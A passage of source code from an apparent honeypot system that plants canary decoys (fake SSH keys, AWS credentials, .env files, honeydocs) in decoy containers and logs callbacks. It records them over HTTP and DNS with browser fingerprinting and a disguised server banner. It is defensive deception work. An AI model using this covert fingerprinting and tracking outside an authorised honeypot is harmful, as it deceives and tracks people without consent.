 """Persona-aware path resolution for canary artifacts.
 Linux-persona deckies use POSIX-shaped paths under ``/home/<user>``.
 "Windows" personas (still Linux containers under the hood — see
 :mod:`decnet.archetypes`) use Windows-shaped paths under
 ``/home/<user>/AppData/...`` so an attacker browsing the filesystem
 through a planted RDP/SMB session sees the right shape.
 The persona lookup is best-effort: callers pass the
 :attr:`decnet.archetypes.Archetype.nmap_os` value (``"linux"`` or
 ``"windows"``); unknown personas fall through to ``"linux"``.
 Operators can always override by passing an explicit
 ``placement_path`` when creating a token.
 """
 from __future__ import annotations
 DEFAULT_LINUX_USER = "admin"
 DEFAULT_WINDOWS_USER = "Administrator"
 # Canonical placements for the synthesizer-driven baseline tokens.
 # Operators can override per-token via the API, but these are the
 # defaults the deploy-time seed uses.
 # Generator name -> path template.  ``{user}`` is filled in by
 # ``default_path_for`` using ``default_user``.
 _LINUX_DEFAULTS: dict[str, str] = {
    "git_config": "/home/{user}/.git/config",
    "env_file": "/home/{user}/.env",
    "ssh_key": "/home/{user}/.ssh/id_rsa",
    "aws_creds": "/home/{user}/.aws/credentials",
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }
 # Same keys as the Linux table; only ``git_config`` and ``env_file``
 # use different templates.
 _WINDOWS_DEFAULTS: dict[str, str] = {
    "git_config": "/home/{user}/AppData/Local/Programs/Git/etc/gitconfig",
    "env_file": "/home/{user}/Desktop/prod.env",
    "ssh_key": "/home/{user}/.ssh/id_rsa",  # OpenSSH on Windows uses the same path
    "aws_creds": "/home/{user}/.aws/credentials",
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }
 def default_user(persona: str) -> str:
    """Return the default account name used in paths for *persona*.
    ``"windows"`` maps to ``DEFAULT_WINDOWS_USER``; every other value
    maps to ``DEFAULT_LINUX_USER``.
    """
    if persona == "windows":
        return DEFAULT_WINDOWS_USER
    return DEFAULT_LINUX_USER
 def default_path_for(generator: str, persona: str = "linux") -> str:
    """Return the default placement path for *generator* under *persona*.
    The Windows table is used only when *persona* is exactly
    ``"windows"``; any other value uses the Linux table.  The
    ``{user}`` placeholder is expanded with :func:`default_user`.
    A generator missing from the table yields
    ``/tmp/<generator>.canary`` instead of an error.
    """
    defaults = _LINUX_DEFAULTS
    if persona == "windows":
        defaults = _WINDOWS_DEFAULTS
    template = defaults.get(generator)
    if template:
        return template.format(user=default_user(persona))
    # Defensive fallback: still give the planter somewhere to write.
    return f"/tmp/{generator}.canary"  # nosec B108 — placement inside attacker-facing decoy container, not host /tmp
 def normalize_placement(path: str) -> str:
    """Validate an operator-supplied placement path.
    Rejects empty or relative paths, NUL bytes, CR/LF characters, and
    any ``..`` path segment.  No other characters are filtered.  The
    ``..`` check is per segment, so a name that merely ends in two
    dots (``/srv/notes../x``) is accepted.
    Returns *path* unchanged when valid; raises :class:`ValueError`
    with a human-readable message otherwise.
    """
    if not path or not path.startswith("/"):
        raise ValueError("placement_path must be absolute (start with '/')")
    if "\x00" in path:
        raise ValueError("placement_path may not contain NUL")
    if "\n" in path or "\r" in path:
        raise ValueError("placement_path may not contain newlines")
    # Compare whole segments: a substring test on "../" would also
    # reject legitimate names such as "notes../".
    if ".." in path.split("/"):
        raise ValueError("placement_path may not contain '..' segments")
    return path
--- a/decnet/canary/planter.py
+++ b/decnet/canary/planter.py
@@ -0,0 +1,307 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Plant / revoke canary artifacts inside running decky containers.
 Single entry point per operation:
 * :func:`plant` writes a :class:`CanaryArtifact` into one decky's
  filesystem via ``docker exec`` (mirroring the SSH driver's
  ``_run_file`` pattern), backdates the mtime, sets the requested
  mode, and publishes ``canary.{token_id}.placed`` on the bus.
 * :func:`revoke` unlinks the file (best-effort) and publishes
  ``canary.{token_id}.revoked``.
 * :func:`seed_baseline` is the deploy-hook helper: synthesises the
  configured baseline set for one decky, persists rows, plants each.
  Failures are logged but do **not** abort the deploy (the deployer
  hook calls this best-effort).
 We don't reuse :class:`SSHDriver` directly because the orchestrator
 driver is tied to its action types (``FileAction`` carries str
 content; canary content is bytes).  The planter takes the same
 shape but speaks bytes-via-base64 over the wire.
 """
 from __future__ import annotations
 import os
 from datetime import datetime, timedelta, timezone
 from secrets import token_urlsafe
 from typing import Any, Iterable, Optional
 from decnet.bus import topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.canary.paths import default_path_for
 from decnet.decky_io import (
    delete_file_from_container,
    resolve_topology_container,
    write_file_to_container,
 )
 from decnet.logging import get_logger
 from decnet.web.db.repository import BaseRepository
 log = get_logger("canary.planter")
 # Container suffix — matches the orchestrator SSH driver's convention
 # (``<decky_name>-ssh``).  Canary placement always happens through the
 # ssh container because every decky has one and it carries the most
 # realistic filesystem layout.
 _SSH_CONTAINER_SUFFIX = "-ssh"
 def _container_for(decky_name: str) -> str:
    """Return the container name for *decky_name*: the name plus ``_SSH_CONTAINER_SUFFIX``."""
    return "{}{}".format(decky_name, _SSH_CONTAINER_SUFFIX)
 # resolve_topology_container is re-exported from decky_io for back-compat
 # with callers (tests, deploy hook) that imported it from this module
 # before the decky_io extraction.
 __all__ = [
    "plant",
    "revoke",
    "resolve_topology_container",
    "seed_baseline",
    "seed_baseline_topology",
 ]
 async def _publish(
    bus: Optional[BaseBus], topic: str, payload: dict[str, Any],
 ) -> None:
    """Best-effort publish — never raises.
    When ``bus`` is None we resolve via :func:`get_bus`; either way
    bus-side failures are logged and swallowed (delivery is at-most-once
    by contract; the DB row is source of truth).
    """
    try:
        owns_bus = bus is None
        target = bus if bus is not None else get_bus()
        if owns_bus:
            await target.connect()
        await target.publish(topic, payload)
        if owns_bus:
            await target.close()
    except Exception as e:  # noqa: BLE001
        log.warning("canary bus publish failed topic=%s err=%s", topic, e)
 async def plant(
    decky_name: str,
    artifact: CanaryArtifact,
    *,
    token_uuid: str,
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Write *artifact* into a decky container and record the outcome.
    The target is *container* when given, otherwise the name from
    :func:`_container_for`.  The file's mtime is "now (UTC) plus
    ``artifact.mtime_offset`` seconds".
    Returns the ``(success, error_or_none)`` pair reported by
    ``write_file_to_container``.  An artifact with an empty path is
    rejected up front with ``(False, <message>)``.
    Side effects: when *repo* is given the token row is moved to
    ``planted`` or ``failed``; on success with *publish* true a
    ``CANARY_PLACED`` event is sent via :func:`_publish`; failures are
    logged as warnings.
    """
    if not artifact.path:
        reason = "planter requires a non-empty artifact.path"
        log.warning("canary.plant skipped: %s decky=%s token=%s", reason, decky_name, token_uuid)
        if repo is not None:
            await repo.update_canary_token_state(token_uuid, "failed", reason)
        return False, reason
    destination = container if container else _container_for(decky_name)
    backdated = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
    ok, failure = await write_file_to_container(
        destination, artifact.path, artifact.content,
        mode=artifact.mode, mtime=backdated,
    )
    if not ok:
        if repo is not None:
            await repo.update_canary_token_state(token_uuid, "failed", failure)
        log.warning(
            "canary.plant failed decky=%s token=%s container=%s err=%r",
            decky_name, token_uuid, destination, failure,
        )
        return ok, failure
    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "planted", None)
    if publish:
        event = {
            "token_id": token_uuid,
            "decky_name": decky_name,
            "placement_path": artifact.path,
            "instrumenter": artifact.instrumenter,
            "generator": artifact.generator,
        }
        await _publish(bus, topics.canary(token_uuid, topics.CANARY_PLACED), event)
    return ok, failure
 async def revoke(
    decky_name: str,
    placement_path: str,
    *,
    token_uuid: str,
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Delete a planted file, mark the token revoked and announce it.
    The target is *container* when given, otherwise the name from
    :func:`_container_for`.  Returns the ``(success, error_or_none)``
    pair reported by ``delete_file_from_container``.
    Note that the state transition and the bus event do not depend on
    the delete succeeding: with *repo* the row is always set to
    ``revoked`` (carrying the error text when the delete failed), and
    with *publish* true a ``CANARY_REVOKED`` event is always sent.
    """
    target_container = container if container else _container_for(decky_name)
    outcome = await delete_file_from_container(target_container, placement_path)
    success, error = outcome
    if repo is not None:
        detail = None if success else error
        await repo.update_canary_token_state(token_uuid, "revoked", detail)
    if publish:
        topic = topics.canary(token_uuid, topics.CANARY_REVOKED)
        event = {
            "token_id": token_uuid,
            "decky_name": decky_name,
            "placement_path": placement_path,
        }
        await _publish(bus, topic, event)
    return success, error
 def _baseline_set() -> Iterable[str]:
    """Return the configured baseline generator names.
    Honors ``DECNET_CANARY_BASELINE`` (comma-separated).  Default is
    a sensible mix that exercises every callback-bearing generator
    plus a passive aws_creds drop for realism.
    """
    raw = os.environ.get(
        "DECNET_CANARY_BASELINE",
        "git_config,env_file,honeydoc,aws_creds",
    )
    return [n.strip() for n in raw.split(",") if n.strip()]
 def _ctx_for(slug: str) -> CanaryContext:
    """Build the :class:`CanaryContext` for callback token *slug*.
    The HTTP base comes from ``DECNET_CANARY_HTTP_BASE`` (default
    ``http://localhost:8088``) and the DNS zone from
    ``DECNET_CANARY_DNS_ZONE`` (default empty string).
    """
    env = os.environ
    return CanaryContext(
        callback_token=slug,
        http_base=env.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088"),
        dns_zone=env.get("DECNET_CANARY_DNS_ZONE", ""),
    )
 async def seed_baseline(
    decky_name: str,
    repo: BaseRepository,
    *,
    persona: str = "linux",
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> list[dict[str, Any]]:
    """Create and plant the baseline canary set on one decky.
    For every name from :func:`_baseline_set` this mints a fresh
    callback slug, generates the artifact, assigns its default path
    for *persona*, persists a token row and hands the artifact to
    :func:`plant`.  Names that ``get_generator`` rejects with
    ``ValueError`` are logged and skipped.
    Returns one summary dict per created token row (``token_uuid``,
    ``generator``, ``kind``, ``callback_token``, ``placement_path``),
    regardless of whether planting succeeded.
    """
    from uuid import uuid4
    summaries: list[dict[str, Any]] = []
    for gen_name in _baseline_set():
        try:
            generator = get_generator(gen_name)
        except ValueError:
            log.warning("canary.seed_baseline: unknown generator %r — skipping", gen_name)
            continue
        slug = token_urlsafe(16)
        artifact = generator.generate(_ctx_for(slug))
        artifact.path = default_path_for(gen_name, persona)
        if gen_name == "aws_creds":
            kind = "aws_passive"
        else:
            kind = "http"
        token_uuid = str(uuid4())
        # Persist before planting so plant() has a row to update.  The
        # row starts in the optimistic "planted" state; plant() rewrites
        # it to "failed" when the write does not succeed.
        row = {
            "uuid": token_uuid,
            "kind": kind,
            "decky_name": decky_name,
            "blob_uuid": None,
            "instrumenter": None,
            "generator": gen_name,
            "placement_path": artifact.path,
            "callback_token": slug,
            "secret_seed": slug,
            "created_by": created_by,
            "state": "planted",
        }
        await repo.create_canary_token(row)
        await plant(
            decky_name, artifact,
            token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
            container=container,
        )
        summaries.append({
            "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
            "callback_token": slug, "placement_path": artifact.path,
        })
    return summaries
 async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
 ) -> list[dict[str, Any]]:
    """Run :func:`seed_baseline` for every decky of one topology.
    The topology is loaded with ``hydrate``; when that returns None a
    warning is logged and an empty list is returned.  Each decky's
    name is taken from ``decky_config["name"]`` or, failing that, its
    own ``name`` key; deckies without a name are skipped.  The target
    container comes from ``resolve_topology_container`` and the
    persona is always ``"linux"``.
    Returns the per-token dicts of all deckies in one flat list, each
    extended with a ``decky_name`` key.
    """
    from decnet.topology.persistence import hydrate
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []
    collected: list[dict[str, Any]] = []
    for decky in hydrated["deckies"]:
        config = decky.get("decky_config") or {}
        decky_name = config.get("name") or decky.get("name")
        if not decky_name:
            continue
        container = resolve_topology_container(
            topology_id, decky_name, decky.get("services") or [],
        )
        # Topology deckies carry no persona here, so linux is used.
        rows = await seed_baseline(
            decky_name, repo,
            persona="linux", created_by=created_by, bus=bus,
            container=container,
        )
        for row in rows:
            row["decky_name"] = decky_name
        collected.extend(rows)
    return collected
--- a/decnet/canary/storage.py
+++ b/decnet/canary/storage.py
@@ -0,0 +1,90 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Filesystem store for operator-uploaded canary blobs.
 Blobs live under ``/var/lib/decnet/canary/blobs/<sha256>`` (override
 via ``DECNET_CANARY_BLOB_DIR``) and are deduplicated by content hash.
 The DB table :class:`decnet.web.db.models.CanaryBlob` mirrors
 metadata; the bytes are read on demand at instrumentation time, so
 the API process never holds large operator uploads in memory longer
 than the request itself.
 Refcount-aware deletion is enforced at the DB layer (see
 :meth:`decnet.web.db.repository.BaseRepository.delete_canary_blob`);
 this module only provides write/read/unlink primitives keyed by
 sha256.
 """
 from __future__ import annotations
 import hashlib
 import os
 from pathlib import Path
 from typing import Tuple
 def blob_dir() -> Path:
    """Return the root directory of the blob store.
    Uses ``DECNET_CANARY_BLOB_DIR`` when set, otherwise
    ``/var/lib/decnet/canary/blobs``.  This function only builds the
    path; it does not create the directory.
    """
    return Path(
        os.environ.get("DECNET_CANARY_BLOB_DIR", "/var/lib/decnet/canary/blobs")
    )
 def _path_for(sha256: str) -> Path:
    # Two-level fan-out (``ab/cd/abcd...``) keeps any one directory
    # from accumulating thousands of entries on busy fleets.  Same
    # shape as Git's loose-object store.
    if len(sha256) < 4:
        raise ValueError("sha256 must be at least 4 chars")
    root = blob_dir()
    return root / sha256[:2] / sha256[2:4] / sha256
 def write_blob(content: bytes) -> Tuple[str, Path, int]:
    """Persist ``content`` under its sha256 path.
    Idempotent: if a file already exists at the content-addressed
    target, nothing is written.  Returns ``(sha256, path,
    size_bytes)``.
    The bytes are written to a uniquely named sibling temp file and
    renamed into place, so a reader never sees a half-written blob
    and two concurrent writers of the same content cannot clobber
    each other's temp file.  If the write or rename fails the temp
    file is removed and the error is re-raised.
    """
    sha = hashlib.sha256(content).hexdigest()
    target = _path_for(sha)
    target.parent.mkdir(parents=True, exist_ok=True)
    if not target.exists():
        # pid + random suffix keeps the temp name unique per writer.
        tmp = target.with_name(
            f"{target.name}.{os.getpid()}.{os.urandom(4).hex()}.part"
        )
        try:
            tmp.write_bytes(content)
            os.replace(tmp, target)
        except BaseException:
            # Don't leave a stale .part behind on failure.
            tmp.unlink(missing_ok=True)
            raise
    return sha, target, len(content)
 def read_blob(sha256: str) -> bytes:
    """Return the stored bytes for *sha256*.
    The location comes from :func:`_path_for`.  A missing file is not
    handled here: the :class:`FileNotFoundError` from the read
    propagates to the caller.
    """
    location = _path_for(sha256)
    return location.read_bytes()
 def unlink_blob(sha256: str) -> bool:
    """Remove the on-disk bytes for *sha256*.
    Returns True when a file was deleted and False when there was no
    file at that location.  Only the missing-file case is absorbed;
    any other error from the unlink propagates.
    """
    victim = _path_for(sha256)
    try:
        victim.unlink()
    except FileNotFoundError:
        removed = False
    else:
        removed = True
    return removed
--- a/decnet/canary/worker.py
+++ b/decnet/canary/worker.py
@@ -0,0 +1,421 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet canary`` worker — HTTP + DNS callback receivers.
 Two surfaces, one process:
 * **HTTP** — a tiny FastAPI app on its own port (default 8088).  The
  only useful route is ``GET /c/{slug}`` which looks up the slug in
  the canary token table, persists a :class:`CanaryTrigger` row,
  publishes ``canary.<token_id>.triggered`` on the bus, and returns
  a 1×1 transparent GIF with a 200 status — the same response for
  known and unknown slugs, so the reply never reveals a match.
 * **DNS** — an authoritative UDP server (default port 5353; set
  ``DECNET_CANARY_DNS_PORT`` to override) for ``*.<canary_zone>``.  Same lookup + persist +
  publish flow, plus a sinkhole A record so the attacker's resolver
  doesn't loop on NXDOMAIN.
 Both surfaces are **stealth** by policy
 (:mod:`feedback_stealth`): no DECNET strings in headers / banners /
 error pages.  The HTTP app suppresses the default ``Server: uvicorn``
 header and answers with a generic ``Server: nginx`` instead; FastAPI's docs/openapi UI is disabled because
 discovering them would tip off the attacker that this is a honeypot.
 The worker is supervised by its own systemd unit
 (``decnet-canary.service``); like every other DECNET worker, it
 crashes loudly rather than masking failures.
 """
 from __future__ import annotations
 import asyncio
 import base64
 import binascii
 import json
 import os
 import time
 import uuid
 from datetime import datetime, timezone
 from typing import Any, Optional
 from fastapi import FastAPI, Request, Response
 from decnet.bus import topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.canary.dns_server import CanaryDNSProtocol, DNSQuery
 from decnet.logging import get_logger
 from decnet.web.db.factory import get_repository
 from decnet.web.db.repository import BaseRepository
 log = get_logger("canary.worker")
 # 1×1 transparent GIF — public-domain canonical bytes.  Returning the
 # same image every time is fine: the body has no information the
 # attacker shouldn't see, and image clients cache it.
 _TRANSPARENT_GIF = bytes.fromhex(
    "47494638396101000100800100000000ffffff21f90401000001002c00000000010001000002024401003b"
 )
 # Namespace used by fingerprint generators to derive mint UUID.
 # Must stay in sync with fingerprint_html._MINT_NAMESPACE.
 _MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
 # In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
 # Maps (token_uuid, src_ip) -> list of monotonic timestamps.
 # Not shared across worker restarts or processes — acceptable for MVP.
 _FP_RATE_WINDOW_S = 60
 _FP_RATE_LIMIT = 30
 _fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
 def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
    """Sliding-window rate check for fingerprint persists.
    Allows at most ``_FP_RATE_LIMIT`` hits per ``(token_uuid, src_ip)``
    pair inside any ``_FP_RATE_WINDOW_S``-second window.  An allowed
    call records its own timestamp; a denied call records nothing.
    Buckets whose newest timestamp has aged out of the window are
    purged at most once per window, so the module-level table cannot
    grow without bound as new pairs keep arriving.
    Args:
        token_uuid: UUID of the canary token that was hit.
        src_ip: Source address attributed to the hit.
    Returns:
        True when the hit fits in the window, False when it is over the limit.
    """
    now = time.monotonic()
    cutoff = now - _FP_RATE_WINDOW_S
    # Opportunistic eviction.  Timestamps are appended in monotonic
    # order, so the last element of a bucket is its newest entry.
    last_sweep = getattr(_fp_rate_allowed, "_last_sweep", None)
    if last_sweep is None or last_sweep <= cutoff:
        _fp_rate_allowed._last_sweep = now  # type: ignore[attr-defined]
        stale_keys = [
            k for k, stamps in _fp_rate_buckets.items()
            if not stamps or stamps[-1] <= cutoff
        ]
        for k in stale_keys:
            del _fp_rate_buckets[k]
    key = (token_uuid, src_ip)
    bucket = [t for t in _fp_rate_buckets.get(key, []) if t > cutoff]
    allowed = len(bucket) < _FP_RATE_LIMIT
    if allowed:
        bucket.append(now)
    _fp_rate_buckets[key] = bucket
    return allowed
 def _is_valid_fp_shape(fp: dict) -> bool:
    """Layer B — structural sanity check on a decoded fingerprint blob."""
    if not isinstance(fp.get("mint"), str) or not fp["mint"]:
        return False
    known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
    present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
    return present >= 3
 def _http_base() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
 def _dns_zone() -> str:
    return os.environ.get("DECNET_CANARY_DNS_ZONE", "").strip(".").lower()
 def _http_port() -> int:
    return int(os.environ.get("DECNET_CANARY_HTTP_PORT", "8088"))
 def _dns_port() -> int:
    # Default 5353 (mDNS-ish, non-privileged) — operators pin :53 via
    # NAT or a CAP_NET_BIND_SERVICE-enabled unit.
    return int(os.environ.get("DECNET_CANARY_DNS_PORT", "5353"))
 def _dns_bind() -> str:
    return os.environ.get("DECNET_CANARY_DNS_BIND", "0.0.0.0")  # nosec B104 — attacker-facing decoy listener, internet exposure is the design
 def _http_bind() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BIND", "0.0.0.0")  # nosec B104 — same rationale
 # ---------------------------- HTTP surface --------------------------------
 def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    """Construct the attacker-facing FastAPI app.
    Disables docs / openapi / redoc — operators query the canary
    surface via the *main* DECNET API, never directly.  Anyone hitting
    these paths is either misconfigured or scanning for a honeypot.
    Args:
        repo: Repository passed to :func:`_record_hit` for token lookup
            and trigger persistence.
        bus: Bus passed to :func:`_record_hit` for event publication.
    Returns:
        The app exposing ``GET /c/{slug}`` plus a bare 404 on ``GET /``.
    """
    app = FastAPI(
        title="",  # don't leak "DECNET" in OpenAPI
        docs_url=None, redoc_url=None, openapi_url=None,
    )
    @app.middleware("http")
    async def _stealth_headers(request: Request, call_next):
        response: Response = await call_next(request)
        # Strip the uvicorn / starlette banner; replace with a
        # generic Server line that matches what most CDNs return.
        response.headers["Server"] = "nginx"
        # Don't leak request id / process id headers.
        if "x-process-time" in response.headers:
            del response.headers["x-process-time"]
        return response
    @app.get("/c/{slug}")
    async def callback(slug: str, request: Request) -> Response:
        raw_nonce = request.query_params.get("k")
        fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
        # ``_fp`` / ``_fp_*`` keys in the persisted header dict are
        # reserved for our own fingerprint metadata and validation
        # output.  Header names are client-controlled and may legally
        # contain underscores, so drop any request header in that
        # namespace — otherwise an attacker could forge a "validated"
        # ``_fp`` entry or spoof the ``_fp_*`` flags.
        merged_headers = {
            name: value
            for name, value in dict(request.headers).items()
            if not name.lower().startswith("_fp")
        }
        if fp_meta:
            merged_headers.update(fp_meta)
        await _record_hit(
            repo, bus,
            slug=slug,
            src_ip=_client_ip(request),
            user_agent=request.headers.get("user-agent"),
            request_path=str(request.url.path),
            dns_qname=None,
            raw_headers=merged_headers,
            parsed_fp=parsed_fp,
            raw_nonce=raw_nonce,
        )
        # Always 200 with a tiny image so the attacker's client sees
        # a "success" — same return regardless of whether the slug is
        # known. Stealth: do NOT distinguish unknown vs known via
        # status code or response body.
        return Response(content=_TRANSPARENT_GIF, media_type="image/gif")
    @app.get("/")
    async def root() -> Response:
        # Bare root returns a generic 404. The decoy posture: pretend
        # to be an empty static-file host that just happens to resolve
        # /c/<slug> when it matches.
        return Response(status_code=404)
    return app
 # Per-chunk size cap.  Real fingerprints fit in one ~3KB GET; honest
 # overflow is handled via chunking (s/i/n + d).  Anything larger than
 # this on a single request is junk, so we drop it instead of letting an
 # attacker inflate a trigger row indefinitely.
 _FP_CHUNK_MAX = 8 * 1024
 def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).
    The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
    * ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
    Returns a tuple of:
    - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
    - ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
      when there's no ``?d=`` or decoding fails.
    """
    out: dict[str, Any] = {}
    parsed_fp: Optional[dict] = None
    if not qp:
        return out, parsed_fp
    o = qp.get("o") if hasattr(qp, "get") else None
    if o:
        out["_fp_open"] = "1"
    d = qp.get("d") if hasattr(qp, "get") else None
    if not d:
        return out, parsed_fp
    if len(d) > _FP_CHUNK_MAX:
        out["_fp_oversize"] = "1"
        return out, parsed_fp
    sid = qp.get("s")
    idx = qp.get("i")
    total = qp.get("n")
    if sid and idx and total:
        out["_fp_sid"] = sid
        out["_fp_idx"] = idx
        out["_fp_total"] = total
        out["_fp_chunk"] = d
        return out, parsed_fp
    # Single-shot: decode and pass back as parsed_fp; validation runs in
    # _record_hit after token lookup so we have the stored nonce at hand.
    try:
        padded = d + "=" * (-len(d) % 4)
        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
        parsed = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        out["_fp_decode_error"] = "1"
        return out, parsed_fp
    if isinstance(parsed, dict):
        parsed_fp = parsed
    else:
        out["_fp_decode_error"] = "1"
    return out, parsed_fp
 def _client_ip(request: Request) -> str:
    # Honor X-Forwarded-For if the operator deployed behind a reverse
    # proxy. Take the leftmost address in the chain; everything after
    # is upstream-proxy noise.
    fwd = request.headers.get("x-forwarded-for")
    if fwd:
        return fwd.split(",", 1)[0].strip()
    if request.client:
        return request.client.host
    return "0.0.0.0"  # nosec B104 — sentinel for "unknown remote"
 # ---------------------------- shared persistence -------------------------
 async def _record_hit(
    repo: BaseRepository,
    bus: BaseBus,
    *,
    slug: str,
    src_ip: str,
    user_agent: Optional[str],
    request_path: Optional[str],
    dns_qname: Optional[str],
    raw_headers: Optional[dict],
    parsed_fp: Optional[dict] = None,
    raw_nonce: Optional[str] = None,
 ) -> None:
    """Resolve slug -> token, persist a trigger row, publish on the bus.
    Hits on unknown slugs return without doing anything: known and
    unknown slugs get the same response (stealth posture), and storing
    every random scan would clutter the DB.
    A non-None *parsed_fp* (single-shot fingerprint that decoded
    cleanly) goes through four checks, stopping at the first failure:
    A) nonce match against the token's ``fingerprint_nonce``,
    B) structural shape check,
    C) mint UUID consistency with the slug,
    D) per-(token, IP) rate limit.
    A failing check sets its ``_fp_*`` flag in the stored headers and
    discards the fingerprint; only a fully valid one is stored under
    ``_fp``.  The trigger row lands either way — the hit itself is
    forensic.  Bus publication and the auto-revoke of fingerprint
    tokens are best effort: failures are logged, not raised.
    """
    token = await repo.get_canary_token_by_slug(slug)
    if token is None:
        return
    final_headers: dict[str, Any] = dict(raw_headers or {})
    if parsed_fp is not None:
        stored_nonce: Optional[str] = token.get("fingerprint_nonce")
        # The chain short-circuits, so later layers (including the rate
        # limiter, which records a timestamp) run only when every
        # earlier layer passed.
        failure: Optional[str]
        if stored_nonce is not None and raw_nonce != stored_nonce:
            failure = "_fp_invalid_nonce"  # Layer A — nonce
        elif not _is_valid_fp_shape(parsed_fp):
            failure = "_fp_invalid_shape"  # Layer B — shape
        elif parsed_fp.get("mint") != str(uuid.uuid5(_MINT_NAMESPACE, slug)):
            failure = "_fp_invalid_mint"  # Layer C — mint UUID consistency
        elif not _fp_rate_allowed(token["uuid"], src_ip):
            failure = "_fp_rate_limited"  # Layer D — rate limit
        else:
            failure = None
        if failure is None:
            final_headers["_fp"] = parsed_fp
        else:
            final_headers[failure] = "1"
            parsed_fp = None
    trigger_row = {
        "token_uuid": token["uuid"],
        "occurred_at": datetime.now(timezone.utc),
        "src_ip": src_ip,
        "user_agent": user_agent,
        "request_path": request_path,
        "dns_qname": dns_qname,
        "raw_headers": final_headers,
    }
    trigger_id = await repo.record_canary_trigger(trigger_row)
    try:
        triggered_topic = topics.canary(token["uuid"], topics.CANARY_TRIGGERED)
        triggered_event = {
            "token_id": token["uuid"],
            "trigger_id": trigger_id,
            "decky_name": token["decky_name"],
            "src_ip": src_ip,
            "user_agent": user_agent,
            "request_path": request_path,
            "dns_qname": dns_qname,
        }
        await bus.publish(triggered_topic, triggered_event)
    except Exception as e:  # noqa: BLE001 — best effort
        log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
    # Fingerprint canaries are single-use: once a valid fingerprint is
    # in, the token is revoked and the slug goes dark.  The attacker
    # still gets the same 200 + GIF on the next hit, so nothing reveals
    # the revocation.  Only fingerprint tokens carry a non-NULL
    # fingerprint_nonce; plain http/dns canaries are never auto-revoked.
    fingerprint_collected = parsed_fp is not None
    if not (fingerprint_collected and token.get("fingerprint_nonce") is not None):
        return
    try:
        await repo.update_canary_token_state(token["uuid"], "revoked")
        await bus.publish(
            topics.canary(token["uuid"], topics.CANARY_REVOKED),
            {"token_id": token["uuid"], "trigger_id": trigger_id,
             "reason": "fingerprint_collected"},
        )
    except Exception as e:  # noqa: BLE001 — trigger row already landed; best effort
        log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
 # ---------------------------- DNS surface --------------------------------
 async def _start_dns_server(
    repo: BaseRepository, bus: BaseBus, *, loop: asyncio.AbstractEventLoop,
 ) -> Optional[asyncio.DatagramTransport]:
    """Bind the canary DNS listener on *loop*.
    Returns the datagram transport, or ``None`` when no zone is
    configured (``DECNET_CANARY_DNS_ZONE`` unset or empty) and the DNS
    surface is therefore disabled.
    """
    zone = _dns_zone()
    if not zone:
        log.info("canary.dns disabled (DECNET_CANARY_DNS_ZONE unset)")
        return None
    async def _on_query(slug: str, query: DNSQuery, src_ip: str) -> None:
        # DNS hits carry no HTTP context: only the queried name is known.
        await _record_hit(
            repo,
            bus,
            slug=slug,
            src_ip=src_ip,
            user_agent=None,
            request_path=None,
            dns_qname=query.qname,
            raw_headers=None,
        )
    def _protocol_factory() -> CanaryDNSProtocol:
        return CanaryDNSProtocol(zone, _on_query)
    bind_addr = (_dns_bind(), _dns_port())
    transport, _unused_protocol = await loop.create_datagram_endpoint(
        _protocol_factory,
        local_addr=bind_addr,
    )
